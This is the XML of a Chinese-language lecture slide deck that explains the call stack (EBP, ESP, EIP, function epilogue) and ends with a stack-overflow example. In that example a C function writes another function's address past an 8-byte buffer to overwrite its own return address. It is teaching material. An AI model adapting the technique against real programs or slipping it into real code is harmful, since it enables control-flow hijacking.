              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3923" y="3430"/>
              <a:ext cx="409"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9705" name="Group 15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A955A60F-07A5-F040-86E5-88A2F09EA9F3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="4284663" y="5084763"/>
            <a:ext cx="2592387" cy="366712"/>
            <a:chOff x="2699" y="2568"/>
            <a:chExt cx="1633" cy="231"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="29717" name="Text Box 16">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B8CEF01A-5E2A-EA4B-B0A3-B0581C58BFF7}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2699" y="2568"/>
              <a:ext cx="1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语句执行前的</a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="1800" b="1" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0">
                  <a:ln>
                    <a:noFill/>
                  </a:ln>
                  <a:solidFill>
                    <a:srgbClr val="6666CC"/>
                  </a:solidFill>
                  <a:effectLst/>
                  <a:uLnTx/>
                  <a:uFillTx/>
                  <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                  <a:cs typeface="+mn-cs"/>
                </a:rPr>
                <a:t>ESP</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="29718" name="Line 17">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C90F25C6-539B-5740-8511-13BB23178EF8}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3923" y="2700"/>
              <a:ext cx="409" cy="4"/>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9706" name="Rectangle 18">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7FCC7B2F-9853-A64F-8A77-7B9FD3437E23}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>函数调用中栈的工作过程</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="29707" name="Rectangle 19">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C51D824A-581B-4F40-B534-8B39F125E0C5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6877050" y="4724400"/>
            <a:ext cx="1511300" cy="287338"/>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29708" name="Rectangle 20">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1A594446-CC6A-DF4E-A57B-5ACC9AD4E24F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6877050" y="4437063"/>
            <a:ext cx="1511300" cy="287337"/>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EIP</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="29709" name="Text Box 21">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FCB0FAF7-40B3-7647-879F-3E6114E68C5B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="592138" y="3068638"/>
            <a:ext cx="3332162" cy="378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996666"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>_AFunc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996666"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>{……return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pop edi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pop esi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pop ebx</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add esp,48h</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栈校验</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pop ebp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ret</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="29710" name="Rectangle 22">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7797F4D3-C556-B74F-BE98-F45817522760}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6877050" y="4149725"/>
            <a:ext cx="1511300" cy="287338"/>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EBP</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="29711" name="AutoShape 23">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DC474C3C-AFC6-C941-AFF3-567370194F56}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6372225" y="2565400"/>
            <a:ext cx="431800" cy="1584325"/>
          </a:xfrm>
          <a:prstGeom prst="leftBrace">
            <a:avLst>
              <a:gd name="adj1" fmla="val 3057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48h</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="82968" name="Rectangle 24">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B6F1415D-4FDE-4743-9646-4371FAA314CC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6877050" y="1628775"/>
            <a:ext cx="1511300" cy="8636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EDI</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ESI</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EBX</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="29713" name="Rectangle 25">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4B16CABA-ACDE-1946-BC4C-B756391D31FA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6877050" y="3862388"/>
            <a:ext cx="1511300" cy="287337"/>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m=3</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29714" name="Rectangle 26">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5DB8BBDE-12C5-814D-B402-DF17D6972268}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6877050" y="3573463"/>
            <a:ext cx="1511300" cy="287337"/>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n=4</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82971" name="Rectangle 27">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{27552014-CC93-1B4A-9BC0-5601E061597A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6443663" y="2492375"/>
            <a:ext cx="2376487" cy="1657350"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="571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972" name="Rectangle 28">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F6F08C3B-E7DE-FA4C-BAB1-023B8E317DC6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6443663" y="4437063"/>
            <a:ext cx="2376487" cy="287337"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="571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6864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55"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="7" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="82955"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="0-#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="8" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="829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mph" presetSubtype="0" fill="hold" grpId="0" nodeType="clickEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animClr clrSpc="rgb" dir="cw">
                                      <p:cBhvr override="childStyle">
                                        <p:cTn id="12" dur="250" autoRev="1" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="82968"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.color</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <a:schemeClr val="bg1"/>
                                      </p:to>
                                    </p:animClr>
                                    <p:animClr clrSpc="rgb" dir="cw">
                                      <p:cBhvr>
                                        <p:cTn id="13" dur="250" autoRev="1" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="82968"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>fillcolor</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <a:schemeClr val="bg1"/>
                                      </p:to>
                                    </p:animClr>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="14" dur="250" autoRev="1" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="82968"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>fill.type</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="solid"/>
                                      </p:to>
                                    </p:set>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="15" dur="250" autoRev="1" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="82968"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>fill.on</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="tru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path" presetSubtype="0" accel="50000" decel="50000" fill="hold" nodeType="clickEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animMotion origin="layout" path="M 3.33333E-6 1.11111E-6 L 3.33333E-6 0.13079 " pathEditMode="relative" rAng="0" ptsTypes="AA">
                                      <p:cBhvr>
                                        <p:cTn id="19" dur="2000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="3"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:rCtr x="0" y="6528"/>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path" presetSubtype="0" accel="50000" decel="50000" fill="hold" grpId="1" nodeType="clickEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animMotion origin="layout" path="M 1.38889E-6 1.48148E-6 L 1.38889E-6 0.0419 " pathEditMode="relative" rAng="0" ptsTypes="AA">
                                      <p:cBhvr>
                                        <p:cTn id="23" dur="2000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="82955"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:rCtr x="0" y="2083"/>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path" presetSubtype="0" accel="50000" decel="50000" fill="hold" nodeType="clickEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animMotion origin="layout" path="M 3.33333E-6 0.13102 L 3.33333E-6 0.37268 " pathEditMode="relative" rAng="0" ptsTypes="AA">
                                      <p:cBhvr>
                                        <p:cTn id="27" dur="2000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="3"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:rCtr x="0" y="12083"/>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path" presetSubtype="0" accel="50000" decel="50000" fill="hold" nodeType="clickEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animMotion origin="layout" path="M 0.00035 0.00509 L -0.16753 0.00509 " pathEditMode="relative" rAng="0" ptsTypes="AA">
                                      <p:cBhvr>
                                        <p:cTn id="31" dur="2000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="2"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:rCtr x="-8403" y="0"/>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path" presetSubtype="0" accel="50000" decel="50000" fill="hold" grpId="2" nodeType="clickEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animMotion origin="layout" path="M 1.38889E-6 0.0419 L 1.38889E-6 0.14699 " pathEditMode="relative" rAng="0" ptsTypes="AA">
                                      <p:cBhvr>
                                        <p:cTn id="35" dur="2000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="82955"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:rCtr x="0" y="5255"/>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path" presetSubtype="0" accel="50000" decel="50000" fill="hold" nodeType="clickEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animMotion origin="layout" path="M 3.33333E-6 0.3618 L 3.33333E-6 0.41435 " pathEditMode="relative" rAng="0" ptsTypes="AA">
                                      <p:cBhvr>
                                        <p:cTn id="39" dur="2000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="3"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:rCtr x="0" y="2616"/>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path" presetSubtype="0" accel="50000" decel="50000" fill="hold" nodeType="clickEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animMotion origin="layout" path="M -0.28611 0.00741 L -0.28611 0.34074 " pathEditMode="relative" rAng="0" ptsTypes="AA">
                                      <p:cBhvr>
                                        <p:cTn id="43" dur="2000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="2"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:rCtr x="0" y="16667"/>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grpId="3" nodeType="clickEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animMotion origin="layout" path="M 1.38889E-6 0.14699 L 1.38889E-6 0.19954 " pathEditMode="relative" rAng="0" ptsTypes="AA">
                                      <p:cBhvr>
                                        <p:cTn id="47" dur="2000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="82955"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:rCtr x="0" y="2616"/>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path" presetSubtype="0" accel="50000" decel="50000" fill="hold" nodeType="clickEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animMotion origin="layout" path="M 3.33333E-6 0.41435 L 3.33333E-6 0.45625 " pathEditMode="relative" rAng="0" ptsTypes="AA">
                                      <p:cBhvr>
                                        <p:cTn id="51" dur="2000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="3"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:rCtr x="0" y="2083"/>
                                    </p:animMotion>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                      </p:childTnLst>
                    </p:cTn>
                  </p:par>
                  <p:par>
                    <p:cTn id="52" fill="hold" nodeType="clickPar">
                      <p:stCondLst>
                        <p:cond delay="indefinite"/>
                      </p:stCondLst>
                      <p:childTnLst>
                        <p:par>
                          <p:cTn id="53" fill="hold" nodeType="withGroup">
                            <p:stCondLst>
                              <p:cond delay="0"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="54" presetID="64" presetClass="path" presetSubtype="0" accel="50000" decel="50000" fill="hold" grpId="4" nodeType="clickEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animMotion origin="layout" path="M 1.38889E-6 0.20995 L 1.38889E-6 -0.31227 " pathEditMode="relative" rAng="0" ptsTypes="AA">
                                      <p:cBhvr>
                                        <p:cTn id="55" dur="2000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="82955"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:rCtr x="0" y="-26111"/>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path" presetSubtype="0" accel="50000" decel="50000" fill="hold" nodeType="clickEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animMotion origin="layout" path="M -0.28646 0.44583 L -0.28646 0.54028 " pathEditMode="relative" rAng="0" ptsTypes="AA">
                                      <p:cBhvr>
                                        <p:cTn id="59" dur="2000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="3"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:rCtr x="0" y="4722"/>
                                    </p:animMotion>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82971"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="blinds(horizontal)">
                                      <p:cBhvr>
                                        <p:cTn id="64" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="829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82972"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="blinds(horizontal)">
                                      <p:cBhvr>
                                        <p:cTn id="69" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="8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5" grpId="0" animBg="1"/>
      <p:bldP spid="82955" grpId="1" animBg="1"/>
      <p:bldP spid="82955" grpId="2" animBg="1"/>
      <p:bldP spid="82955" grpId="3" animBg="1"/>
      <p:bldP spid="82955" grpId="4" animBg="1"/>
      <p:bldP spid="82968" grpId="0" animBg="1"/>
      <p:bldP spid="82971" grpId="0" animBg="1"/>
      <p:bldP spid="8297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3200" dirty="0" err="1"/>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0" err="1"/>
              <a:t>AFunc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0" err="1"/>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0" err="1"/>
              <a:t>i,int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0"/>
              <a:t> j)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0"/>
              <a:t>{</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0" err="1"/>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0"/>
              <a:t> m = 3;int n = 4;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0"/>
              <a:t>    char </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0" err="1"/>
              <a:t>szBuf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0"/>
              <a:t>[8] = {0}; </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0"/>
              <a:t>    *(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0" err="1"/>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0"/>
              <a:t> *)((</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0" err="1"/>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0"/>
              <a:t>)szBuf+20) = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0" err="1"/>
              <a:t>BFunc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0"/>
              <a:t>;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0"/>
              <a:t>    m = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0" err="1"/>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0"/>
              <a:t>;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0"/>
              <a:t>    n = j;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0" err="1"/>
              <a:t>BFunc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0" err="1"/>
              <a:t>m,n</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0"/>
              <a:t>);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0"/>
              <a:t>    return 8;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0"/>
              <a:t>}</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="3200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4915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栈溢出利用实例</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
